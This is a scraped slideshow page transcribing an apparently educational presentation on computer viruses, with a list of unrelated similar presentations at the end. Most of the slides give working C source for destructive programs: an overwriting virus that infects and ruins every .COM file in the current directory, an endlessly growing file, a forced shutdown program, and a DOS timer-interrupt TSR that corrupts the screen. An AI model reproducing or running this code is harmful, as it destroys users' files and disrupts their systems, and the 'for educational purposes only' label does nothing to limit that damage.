Presentation is loading. Please wait.

Presentation is loading. Please wait.

 Attaches itself to a program or file leaving infections as it travels.  Usually attached to an executable file (.exe)  Cannot be spread without a.

Published byDora Butler Modified over 8 years ago

Similar presentations

Presentation on theme: " Attaches itself to a program or file leaving infections as it travels.  Usually attached to an executable file (.exe)  Cannot be spread without a."— Presentation transcript:

1

2  Attaches itself to a program or file leaving infections as it travels.  Usually attached to an executable file (.exe)  Cannot be spread without a human action, (such as running an infected program) to keep it going.

3 Some basic steps of a source code virus- 1. Find a file to infect, be it an executable, source, or whatever. (If none found, go to step 3) 2. Place virus in file. 3. Decide if any activation routines are met and, if so, activate. 4. Return to host or terminate and return to DOS.

4 Infections destroy the programs and cannot be cured. FOR EDUCATIONAL PURPOSES ONLY, DO NOT RELEASE!

5 Simple overwriting virus STEPS : 1. Finds all “.COM” files in the specified directory using FindFirst(). 2. Opens virus file in read only mode. 3. Opens host file (file searched in findfirst()) in read & write mode. Virus Code # 1 It will infect all.COM files in the current directory.

6 4. Read a block of data of 256 byte size. 5. Write the block into host file. 6. Repeat 4 and 5 until whole virus code is copied. 7. Close virus and host file. 8. Select the next file in the searched list and Go To Step 2. 9.Return when all searched files have been infected.

7 #include #include /* Pre-processor Directives*/ #include FILE *Virus,*Host; int x,y,done; char buff[256]; struct ffblk ffblk; /*Information about searched files*/ main() { done = findfirst("*.COM",&ffblk,0); /* Find a.COM file */ while (!done) /* Loop for all COM‘s in DIR*/ { printf("Infecting %s\n", ffblk.ff_name); /* Inform user */ Virus=fopen(argv[0],"rb"); /* Open infected file */ Host=fopen(ffblk.ff_name,"rb+"); /* Open new host file */

8 x=9504; /* Virus size - must be correct for */ while (x>256) /* OVERWRITE new Host */ { /* Read/Write 256 byte */ fread(buff,256,1,Virus); /* chunks until bytes */ fwrite(buff,256,1,Host); /* left < 256 */ x-=256; } fread(buff,x,1,Virus); /* Finish off copy */ fwrite(buff,x,1,Host); fcloseall(); /* Close both files and*/ done = findnext(&ffblk); /* go for another one. */ } /* Activation would go */ /* here */ return (0); /* Terminate */ }

9 A self growing file. Virus Code # 2 //START v.c #include void main() { while(1) { system("dir>>âša.exe"); } //END

10 void main (void) { system("shutdown -s"); } Save the above file as close.c. compile (ALT + F9). close the turbo c compiler open that directory in window of close.c (default directory c:\tc\bin) Open its exe file (close.exe). After some time your window operating system will shutdown. Shut Down Program

11 Virus Code # 3 TSR Program has a timer interrupt selects a random row and columns position at each run writes space at that position terminates, but, stays resident.

12 #include"dos.h" #include void interrupt (*prevtimer)(); void interrupt mytimer(); void writechar(char ch,int row,int col,int attr); char far* scr; int a,b; void main() { scr=(char far*) 0xb8000000; prevtimer=getvect(8); setvect(8,mytimer); keep(0,1000); } /* Pre-processor Directives*/

13 void interrupt mytimer() { a=random(25); b=random(80); writechar(' ',a,b,0); (*prevtimer)(); } void writechar(char ch,int row,int col,int attr) { *(scr+row*160+col*2)=ch; *(scr+row*160+col*2+1)=attr; }

14 THANK YOU

Download ppt " Attaches itself to a program or file leaving infections as it travels.  Usually attached to an executable file (.exe)  Cannot be spread without a."

Similar presentations

Java Control Statements

Java Control Statements
C Language.

C Language.
Memory Protection: Kernel and User Address Spaces  Background  Address binding  How memory protection is achieved.

Memory Protection: Kernel and User Address Spaces  Background  Address binding  How memory protection is achieved.
Constructor. 2 constructor The main use of constructors is to initialize objects. A constructor is a special member function, whose name is same as class.

Constructor. 2 constructor The main use of constructors is to initialize objects. A constructor is a special member function, whose name is same as class.
R4 Dynamically loading processes. Overview R4 is closely related to R3, much of what you have written for R3 applies to R4 In R3, we executed procedures.

R4 Dynamically loading processes. Overview R4 is closely related to R3, much of what you have written for R3 applies to R4 In R3, we executed procedures.
What is a pointer? First of all, it is a variable, just like other variables you studied So it has type, storage etc. Difference: it can only store the.

What is a pointer? First of all, it is a variable, just like other variables you studied So it has type, storage etc. Difference: it can only store the.
Scope and Lifespan of Identifiers. Every function has a scope What does that mean? That means that every identifier that is created in a function (that’s.

Scope and Lifespan of Identifiers. Every function has a scope What does that mean? That means that every identifier that is created in a function (that’s.
Lecturer: Fadwa Tlaelan

Lecturer: Fadwa Tlaelan
Unit 18 Data Security 1.

Unit 18 Data Security 1.
Scripts and Flow Control. Scripts So far we have been entering commands directly into the command line But there is a better way Script files (and functions)

Scripts and Flow Control. Scripts So far we have been entering commands directly into the command line But there is a better way Script files (and functions)
True or false A variable of type char can hold the value 301. ( F )

True or false A variable of type char can hold the value 301. ( F )
CSC 501 Lecture 2: Processes. Von Neumann Model Both program and data reside in memory Execution stages in CPU: Fetch instruction Decode instruction Execute.

CSC 501 Lecture 2: Processes. Von Neumann Model Both program and data reside in memory Execution stages in CPU: Fetch instruction Decode instruction Execute.
8.7 Memory management Program E Program D System memory DOS INT 21, function 48H: Allocate Memory Specification: allocates a number of memory paragraphs.

8.7 Memory management Program E Program D System memory DOS INT 21, function 48H: Allocate Memory Specification: allocates a number of memory paragraphs.
Arrays Data Structures - structured data are data organized to show the relationship among the individual elements. It usually requires a collecting mechanism.

Arrays Data Structures - structured data are data organized to show the relationship among the individual elements. It usually requires a collecting mechanism.
Structure of DOS application programs. Contents: 1. PSP 2..COM and.EXE 3. TSR: Terminate and Stay Resident Programs.

Structure of DOS application programs. Contents: 1. PSP 2..COM and.EXE 3. TSR: Terminate and Stay Resident Programs.
Introduction to Sensors

Introduction to Sensors
Overview scope - determines when an identifier can be referenced in a program storage class - determines the period of time during which that identifier.

Overview scope - determines when an identifier can be referenced in a program storage class - determines the period of time during which that identifier.
Using Visual C++ and Pelles C

Using Visual C++ and Pelles C
The switch statement: an N-way selection statement.

The switch statement: an N-way selection statement.
Working with Arduino: Lesson #1: Getting Acquainted with the Kit EGN1007.

Working with Arduino: Lesson #1: Getting Acquainted with the Kit EGN1007.

Similar presentations

Ads by Google